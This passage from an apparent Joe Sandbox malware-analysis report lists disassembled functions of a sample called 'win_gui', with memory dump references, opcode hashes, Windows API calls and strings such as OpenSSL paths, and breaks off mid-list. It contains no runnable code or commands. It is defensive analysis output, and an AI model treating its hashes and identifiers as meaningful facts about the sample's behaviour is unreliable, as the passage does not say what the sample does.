                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54be8d63dcb36c630541592143ae4417186bd5017863cb0d88096e15250925c9
                                  • Instruction ID: cdde7ea9bcd7c0172f81bea178ddf8a9f300c562073cb4918675ab37b0cfafd1
                                  • Opcode Fuzzy Hash: 54be8d63dcb36c630541592143ae4417186bd5017863cb0d88096e15250925c9
                                  • Instruction Fuzzy Hash: 454114756083418FC344DF29C8859ABFBE5FBC8304F844A6EF89997341D630EA48CB96
                                  Function 00615430 Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c9474dcce882304f32ea07bd2838137c8eadf43b797c80090b573d6ffe5cc27
                                  • Instruction ID: a01a830c2e6108cbd89664ef8dcfa592ee2925def098b8734056919868b8bd09
                                  • Opcode Fuzzy Hash: 9c9474dcce882304f32ea07bd2838137c8eadf43b797c80090b573d6ffe5cc27
                                  • Instruction Fuzzy Hash: EE41F5756093418FC340CF28C48099BFBE5FB88318F844A6EF89997342D635EA45CB92
                                  Function 0060A940 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 440d18c16333a99b9ec3fe1f75711f6f2e0e947683d5bcb171abfb4938a70a0a
                                  • Instruction ID: f36de8a47dd143e1ae297238e8ddf35500cf8c45eef56737b7715e51bf7c9abb
                                  • Opcode Fuzzy Hash: 440d18c16333a99b9ec3fe1f75711f6f2e0e947683d5bcb171abfb4938a70a0a
                                  • Instruction Fuzzy Hash: 543197612093C29EC30A8E6D48806A6FF65AF66200B4C87CEE8C5DF787C114D5A9C7F6
                                  Function 00604ED0 Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b324f41b0e88b4e5bcc5b91a53d7904975d1ffdaca40da9d1db4c34f85686ea8
                                  • Instruction ID: b9360e3e761f0bbe232bc0ff96d258a3de13d563f59f1525c1777f4aa6cf22c7
                                  • Opcode Fuzzy Hash: b324f41b0e88b4e5bcc5b91a53d7904975d1ffdaca40da9d1db4c34f85686ea8
                                  • Instruction Fuzzy Hash: 732160327745310BE398E5798C0672BA2D2DBC8660B09C739F655D72C1E968E923D3C4
                                  Function 006074A0 Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e3f04b7259fe156f6e13b5ad01198d957c11438166dba12698731ef2e7f4b09
                                  • Instruction ID: 3a3c3b3d8218e622374110263fd2170c3c5c1ac6534f66c68b39903b4aeaf32b
                                  • Opcode Fuzzy Hash: 0e3f04b7259fe156f6e13b5ad01198d957c11438166dba12698731ef2e7f4b09
                                  • Instruction Fuzzy Hash: 7721903277043107E398E5398C0672BA2D3DBC8A60B09C739F655D72C1E968E922C3C0
                                  Function 00616080 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c57dcdfe87d4dd341c7486ddfa075be9a139a0380bf08aa7d9ce5fa8b861033
                                  • Instruction ID: 54049583a3b007c2e3561b3af22986ffd2e011a675e91a433e55946f4ed5a7e7
                                  • Opcode Fuzzy Hash: 6c57dcdfe87d4dd341c7486ddfa075be9a139a0380bf08aa7d9ce5fa8b861033
                                  • Instruction Fuzzy Hash: 0431E8B56142009FCB44DF28D4C1A5AB7E5FF8C314F85496AEC89DB356DB30E944CBA2
                                  Function 00614350 Relevance: .1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f100d455a4950e46668d173c2b18554874aec3c12782ca5a9d9a56762644e5c
                                  • Instruction ID: 2c553241d28bdec1562a0c3032994ba10bfc9b68a72aee37171e128284603955
                                  • Opcode Fuzzy Hash: 3f100d455a4950e46668d173c2b18554874aec3c12782ca5a9d9a56762644e5c
                                  • Instruction Fuzzy Hash: A811A2311057C647C3318E6AC84465BBFF5EF86320F080B6ED5D646643DB25E60DC751
                                  Function 005C4369 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba98cb3dc6131dff6eb5b8ff3e6688a60479c58a9f8825fee670c053c8cfed1d
                                  • Instruction ID: b6e7b16fabcd9eb1b6e7017915497d99d83ef0d2b7d0f7eef28577595253d313
                                  • Opcode Fuzzy Hash: ba98cb3dc6131dff6eb5b8ff3e6688a60479c58a9f8825fee670c053c8cfed1d
                                  • Instruction Fuzzy Hash: 5511DB66E3007009C7080ABE6C50633FB929FC262735B85A7EDD4EF0C2C164DD1096E0
                                  Function 005C6F36 Relevance: 82.3, APIs: 1, Strings: 46, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteCriticalSection.KERNEL32(006D9828), ref: 005C704C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalDeleteSection
                                  • String ID: !$#$#$#$#$#$'$($*$-$.$/$/$/$0$1$4$4$5$6$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F
                                  • API String ID: 166494926-449599406
                                  • Opcode ID: 1ceaf77dd842367c45a0df6c7e936f3c4d8d396b7277c647802098d35d25b2bc
                                  • Instruction ID: 353cceaa6ca14f32f6e8aadb58164601263504bc946102580d9e14760d583407
                                  • Opcode Fuzzy Hash: 1ceaf77dd842367c45a0df6c7e936f3c4d8d396b7277c647802098d35d25b2bc
                                  • Instruction Fuzzy Hash: F9417350D092C9D9EB02D6A8D65C7DEBFB11F27308F085099C5843A282E6FF0609D77B
                                  Function 005C85EE Relevance: 54.4, APIs: 2, Strings: 29, Instructions: 154synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005D1A97: EnterCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B01
                                    • Part of subcall function 005D1A97: KiUserCallbackDispatcher.NTDLL(00010456,00000001), ref: 005D1B09
                                    • Part of subcall function 005D1A97: LeaveCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B10
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005C8631
                                  • CloseHandle.KERNEL32(00000000,?,000000FF), ref: 005C863F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CallbackCloseDispatcherEnterHandleLeaveObjectSingleUserWait
                                  • String ID: "$"$"$%$'THWC$+$-$/$L$L$L$L$L$L$L$L$L$L$T'S'H'W'W'B'C''$}$}$}$}$}$}$}$}$}$}
                                  • API String ID: 3949274620-4191246222
                                  • Opcode ID: bcc73433e38be2733c5a501d7edec34d9f8bba7011db472e539727b8bf055bdc
                                  • Instruction ID: 25a3098b39cd9745d2b505f96aebdff786f218c1ed7aa0f70d93ba5e8d07316b
                                  • Opcode Fuzzy Hash: bcc73433e38be2733c5a501d7edec34d9f8bba7011db472e539727b8bf055bdc
                                  • Instruction Fuzzy Hash: 64616320D0D2C9DDEB12CBE8D448BDEBFB16F66308F18509DD5942B382C6BA4509C776
                                  Function 00625540 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 345COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 0062556A
                                  • ___from_strstr_to_strchr.LIBCMT ref: 006255E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: , name=$, value=$..\..\openssl-1.1.0f\crypto\engine\eng_cnf.c$EMPTY$LIST_ADD$LOAD$SO_PATH$default_algorithms$dynamic$dynamic_path$engine_id$init$section=$soft_load
                                  • API String ID: 601868998-4150970591
                                  • Opcode ID: 9b18c086a9a40395f728a223c27396c9a1fbbc2e5f77ef09ad6305442fc176fd
                                  • Instruction ID: fe41deef1cb862c721ddcbd75fc84b58e918259dcb5cc6c37cc2fa6144b6474b
                                  • Opcode Fuzzy Hash: 9b18c086a9a40395f728a223c27396c9a1fbbc2e5f77ef09ad6305442fc176fd
                                  • Instruction Fuzzy Hash: 25A16871A44F615AD7312E307C42BB73F87AB52358F880465F987DA352F677CD088AA2
                                  Function 00629900 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 210COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _strspn
                                  • String ID: $ $ ,$..\..\openssl-1.1.0f\crypto\pem\pem_lib.c$DEK-Info:$ENCRYPTED$Proc-Type:
                                  • API String ID: 3684824311-3201255450
                                  • Opcode ID: 2bdb262091b7c3080012c4479625b78af8cb2037da8828136e02e93090eb59b1
                                  • Instruction ID: 9e1abc85caca3474d941e68308bda6e0100d92301be8681c58ba013c0becc4f4
                                  • Opcode Fuzzy Hash: 2bdb262091b7c3080012c4479625b78af8cb2037da8828136e02e93090eb59b1
                                  • Instruction Fuzzy Hash: C7512872BC431239E33135A87C03FEB278B5B91B19F090466FA4CF92C3F691991185BA
                                  Function 006608D0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6,00000000,?,?,?,?,006606C1,?,?,00000000,00000001), ref: 0066094C
                                  • SetConsoleMode.KERNEL32(00000000,?,?,?,006606C1,?,?,00000000,00000001), ref: 0066094F
                                  • GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?), ref: 00660979
                                  • GetStdHandle.KERNEL32(000000F6,?,000001FF,?,00000000), ref: 0066099D
                                  • ReadConsoleW.KERNEL32(00000000), ref: 006609A0
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000200,00000200,00000000,00000000), ref: 00660A12
                                  • GetStdHandle.KERNEL32(000000F6,000001FF,000001FF,?,00000000), ref: 00660A41
                                  • ReadConsoleA.KERNEL32(00000000), ref: 00660A44
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00660AD2
                                  • GetStdHandle.KERNEL32(000000F6,00000000,?,?,00000000,00000001), ref: 00660B65
                                  • SetConsoleMode.KERNEL32(00000000), ref: 00660B68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ConsoleHandle$ModeRead$ByteCharEnvironmentMultiVariableWide___from_strstr_to_strchr
                                  • String ID: OPENSSL_WIN32_UTF8
                                  • API String ID: 2229543266-1166498146
                                  • Opcode ID: 65a175d35ecf7687048344c9246eef9bfbe1a3ef8525e10b83c70a77575a0142
                                  • Instruction ID: 3a0b9d459e9a931ca42a289b5a05220fcf3b49dce85067ca910d7b90205e72ae
                                  • Opcode Fuzzy Hash: 65a175d35ecf7687048344c9246eef9bfbe1a3ef8525e10b83c70a77575a0142
                                  • Instruction Fuzzy Hash: 77711671A053015FF720AF68DC59BAB73EBEB84318F100A3AF490C72A1EB71D9458B56
                                  Function 005C7277 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32(012FFC04,00000000,006D9874,006D9A1C,?,?,?,005C816D,0000000A), ref: 005C728D
                                  • lstrcmpW.KERNEL32(?,00000005,?,?,?,005C816D,0000000A), ref: 005C72D4
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C7313
                                  • lstrcpyW.KERNEL32(00000000,006CAB48,?,?,?,005C816D,0000000A), ref: 005C7393
                                  • lstrcatW.KERNEL32(00000000,?,?,?,?,005C816D,0000000A), ref: 005C739D
                                  • EnterCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73A4
                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73BF
                                  • LeaveCriticalSection.KERNEL32(012FFC04,?,?,?,005C816D,0000000A), ref: 005C73E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                  • String ID: 1m1mRm1mm$2$C$m
                                  • API String ID: 2137583188-2970559342
                                  • Opcode ID: dc130646c8ccbf6939e75c93d08201ef2b308e133e4498bbbbec2c9926b8f4e5
                                  • Instruction ID: 727569e402cabf6e1df3f049f13ab66eff130a5ba23e8aa8e4cdecf76a51d18f
                                  • Opcode Fuzzy Hash: dc130646c8ccbf6939e75c93d08201ef2b308e133e4498bbbbec2c9926b8f4e5
                                  • Instruction Fuzzy Hash: 3751E230D082899FDB11CFA9C848BAEBFF6BF59304F14448DD891AB252D7798A45CF60
                                  Function 00677674 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 006776B8
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F24
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F36
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F48
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F5A
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F6C
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F7E
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F90
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FA2
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FB4
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FC6
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FD8
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FEA
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FFC
                                  • _free.LIBCMT ref: 006776AD
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 006776CF
                                  • _free.LIBCMT ref: 006776E4
                                  • _free.LIBCMT ref: 006776EF
                                  • _free.LIBCMT ref: 00677711
                                  • _free.LIBCMT ref: 00677724
                                  • _free.LIBCMT ref: 00677732
                                  • _free.LIBCMT ref: 0067773D
                                  • _free.LIBCMT ref: 00677775
                                  • _free.LIBCMT ref: 0067777C
                                  • _free.LIBCMT ref: 00677799
                                  • _free.LIBCMT ref: 006777B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
